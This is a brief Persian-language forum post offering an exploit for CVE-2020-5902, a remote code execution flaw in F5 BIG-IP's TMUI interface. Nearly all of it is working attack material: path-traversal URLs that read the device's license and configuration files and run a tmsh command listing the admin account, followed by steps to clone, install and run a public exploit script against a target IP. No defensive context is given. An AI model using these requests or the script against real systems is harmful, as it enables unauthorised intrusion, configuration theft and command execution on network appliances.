اکسپلویت CVE-2020-5902 برای BIG-IP نسخه 11 تا 15 که TMUI دارای باگ RCE میباشد
مثال
نصب و تست اکسپلویت
مثال
کد:
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
نصب و تست اکسپلویت
کد:
git clone https://github.com/yasserjanah/CVE-2020-5902 cd CVE-2020-5902/ pip3 install -r ./requirements.txt python3 exploit-CVE-2020-5902.py -ip <IP> -b